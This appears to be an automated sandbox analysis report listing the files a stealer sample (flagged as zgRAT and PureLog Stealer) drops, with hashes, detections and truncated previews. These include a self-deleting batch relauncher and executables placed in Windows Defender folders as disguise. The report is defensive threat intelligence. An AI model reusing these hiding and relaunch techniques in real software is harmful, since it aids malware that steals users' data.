SHA1:	BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
SHA-256:	C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
SHA-512:	290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8\|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:...& ....8....r

C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Uninstall Information\a4a755f39d8609

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with very long lines (791), with no line terminators
Category:	dropped
Size (bytes):	791
Entropy (8bit):	5.90803378664458
Encrypted:	false
SSDEEP:	24:0Rccc2NXhvr7GFsufLxpABnAwD0mhGERVQ:rNWGFRLABfP/M
MD5:	CB6B6A3879943BFF324D292F0AA56219
SHA1:	3B528AD67CFD37F34A78BBF030416609482836A5
SHA-256:	E90057662317652E2151F630334E7F5B5042CE29D493C73A4CF7996292725318
SHA-512:	1E93F82F27988E0F0C55282AF3AE4F0F76E36331A0890273EB387EC20AB1322DBBF823D368A31FF69545A2BE1A9D51BEF01D6478EB00D2E6B05B50829F546258
Malicious:	false
Preview:	dEfmVEr8aXNuYOtR4oZ6kiEVpLUH1ZWALRcnnmtNaAw42QAwk1PvEyM5AK6JujGBANjHwFoR5LfkvKcZLhhAKk5WFhndqkd03v3or3AeN702SmJ0sh8MCG0ZSMBPcLlUsoq9QxrShCwMtCDdXxvIlQyw5dWf1vCCWfKn5Kj40qpAUnqPIi1oactb03EwaLaw9t0N2ZhMN0S5lycRxHWS3Xm3wtxCGxdoP3AkxcWsBpbjKy0Cbw8TzI2lH6bJmfGaXoprx1eVvoRO6Dt83ulTyKzHAZd0BNGgiBMgIIPjSnhK0opENdQ13xlMyirXXnUiivp41NzufBALmoQVtZnh6Omva9rjb1LpT9mF9uMAnfW2xZkKSVo89wlTJ4e1fQTnzU2mBLW8Mn4b2u7AYhQGNNqhYT6EPVeWMsCch7IH8pwV1KbY6ed89NamoVNsPRs1IhOJrfdaYJHibUpO1hIv1gX8SZyMua1q64MT5RrbBCkzF2LUp90sJ79mKP1SrRq7RblgHVSjzquz5h3ZNdgujJg95kJpaYutVmhoQpMTqR2dMJqmWbENu6YI4mlhMnJb6AdT9OIiQMDSRDwv3gT8Th9ZOZtoDpHDIagLqXnHSg6i2F00z0nqTKHZBEFjeeelFAK0hlEf3LpxkbhIi3yNCbt7THKmSDmyBVc25ATOvIxIeUykg6BlqQjnQMhabcNzj1vP8oNijjc3old9SkFVCAHvwymsd3xS47jmijl2tcCGyp9othH1X2xitAdJCeFpwJ9qC0at8Nmk8B7Hz785w65

C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1995264
Entropy (8bit):	7.563817177395898
Encrypted:	false
SSDEEP:	24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
MD5:	0F52130D0A1ABBE40D9F582B1F95A3E3
SHA1:	BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
SHA-256:	C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
SHA-512:	290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8\|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:...& ....8....r

C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Defender\Platform\a4a755f39d8609

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.758625743902791
Encrypted:	false
SSDEEP:	6:lf/DDw/RBNfX4kVbph/Ni8gUdL9SiWDdK3n:N//w/RHfX4ubD/OUxAin3n
MD5:	EE1F14E391226AF7439E757E4EFB24B9
SHA1:	3374AE5AEBF25D852A2261A34861390A4E4EAD96
SHA-256:	4B5CDACAF4BBF7A2646D3679768420E1DB71FADED8BFEF606C653F9C35A680BF
SHA-512:	B06019209A0721D4D02B0D9C83B92026FBCB1C2A1329890A77C3EAA845A79E2ED7022E1D1FA38A8DFEE187606A1BF6D7C65831A6F444872C209FCD335A4CB262
Malicious:	false
Preview:	bMRJi7mP0B5qfBsaXBFav9hXR9WlTWz3FyIcaHwqO4M74BKJtpef1Lbco32jlB5dMBkr3QAQOZL0wkdQyM1n1UC3XpxgPNEN8sv2adPdpOQbAkpEaluYJRl19qUNddBBU81Dzk0V6Y8nEk3wAtGocpDrH33uICAMNOHCslPzuZcvT8xZwhNtWXip4K65rGM4XvZzd1DZdQ3DN

C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1995264
Entropy (8bit):	7.563817177395898
Encrypted:	false
SSDEEP:	24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
MD5:	0F52130D0A1ABBE40D9F582B1F95A3E3
SHA1:	BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
SHA-256:	C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
SHA-512:	290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8\|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:...& ....8....r

C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Etqq32Yuw4.exe.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2041
Entropy (8bit):	5.374034001672589
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vtp5wmjB
MD5:	6594A52AA7EC9BF342D53EF8C5C3F92F
SHA1:	E4439EF0FB0002B8DAD1D7FC4BA598FEE910F4DE
SHA-256:	1BCDE01217E85B5A7304A3DF69926B2B046B11826E3A70E78D220B063DB5EE2B
SHA-512:	29B10494189EFC74EC781413CA1954053EA044EFA879C22EE1FC36D5CD80438F36EA87B7C9C8E0BC5216F13F2DDB893B37E5494A61A8A7DD830A5810A2016A84
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

Download File

Process:	C:\Windows\CbsTemp\System.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\gmRWetzDcocJEC.exe.log

Download File

Process:	C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.161695070293844
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1wvg8KOZG1wkn23frh:HTg9uYDEm4GfF
MD5:	61DE354E5B1F87172810F0DC42476417
SHA1:	A7A6CD5F48A53C68315BE49E48686BC6E9DAE86A
SHA-256:	55A7B52774FC396AEA41F4860FA3EE92C1786BE016CA8DE5A7E87B6E944A7F7D
SHA-512:	9589C400798044B069E910E97A12A833D237AF81D87A9FDC386FFD3FFE085E14ACC2A6C2F19367AB485B5BAA1B03FC8D0750E984ABE64D3532296DB18B0A78D0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\Etqq32Yuw4.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lE7emhVBWP.bat"

C:\Users\user\AppData\Local\Temp\qrXWXdvzxq

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.103465189601645
Encrypted:	false
SSDEEP:	3:x2huCQ:x3CQ
MD5:	7F98B6D33C1A046E4DA8DBF71BC1F469
SHA1:	D017C5E2984371AC8E55452EEE7B0AD17B91BD5B
SHA-256:	65E01DACDA64052AC781C19A872BC2B9E423CEA59052E3A45150D8C4B3A328AD
SHA-512:	F882FC2DC32E64D10F7D7C7E339AFD13F5736112F49564D5D081CC5A5C69C39BEC6B1F23C9BB217FDEFCACE2001302F46A79CC93F98B2F3593B316F5FBB018DD
Malicious:	false
Preview:	V99z9b8IKYZNZVgiVSXlcsRpI

C:\Users\user\Desktop\9e249a67d2f7da

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	203
Entropy (8bit):	5.721267403383102
Encrypted:	false
SSDEEP:	6:pt0RBZ8QbTXcXQcFn9rXPVJAv3EAkEnvd:pGRBZ8QPcdlrUEhOvd
MD5:	DA020A76235514A014E9CE7C8BAAF0DE
SHA1:	935831FADD88F5DDCD7A3CE60C51ADA9E9F5993A
SHA-256:	8143DBCFAEAED243E7E023537F91989816E7AB24AEA16E8B69F21DE0BFD6A415
SHA-512:	08DDF3BCE29D19CFC38F71F147150C8259236C091D572709808C54BD897DD2CB31220214D06486D09A6DCC480469FE4B58131C0E391834FBC9B9A6B19F74DCA9
Malicious:	false
Preview:	ueUHONO2hqoTi2jQtd0UQ41CWGWbngEdabaoAocY3YSOpiObm8ePhn50mSuH0xPAmL2Gb5QEAcb2lnXy25yoCy5xgkBs4UhFISlepH9qsZPFLCP846P58k8xPFk13hKq5WtTB3Iv5H6mj0leVCx8FlGiTyOjhIxKOjJzS57BxeA0oVNZeGf0tMkUPL9NojNwUvYAqvLZFwK

C:\Users\user\Desktop\GxFitJjJ.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: KzLetzDiM8.exe, Detection: malicious, Browse Filename: f3I38kv.exe, Detection: malicious, Browse Filename: aimware.exe, Detection: malicious, Browse Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse Filename: r6cRyCpdfS.exe, Detection: malicious, Browse Filename: tBnELFfQoe.exe, Detection: malicious, Browse Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse Filename: 67VB5TS184.exe, Detection: malicious, Browse Filename: F3ePjP272h.exe, Detection: malicious, Browse Filename: cbCjTbodwa.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\NvtiWYey.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OsUqsYts.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QgYydmoq.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\TnWHzEjm.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\pZhlLBKs.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xOlSJheb.log

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.529329139831718
Encrypted:	false
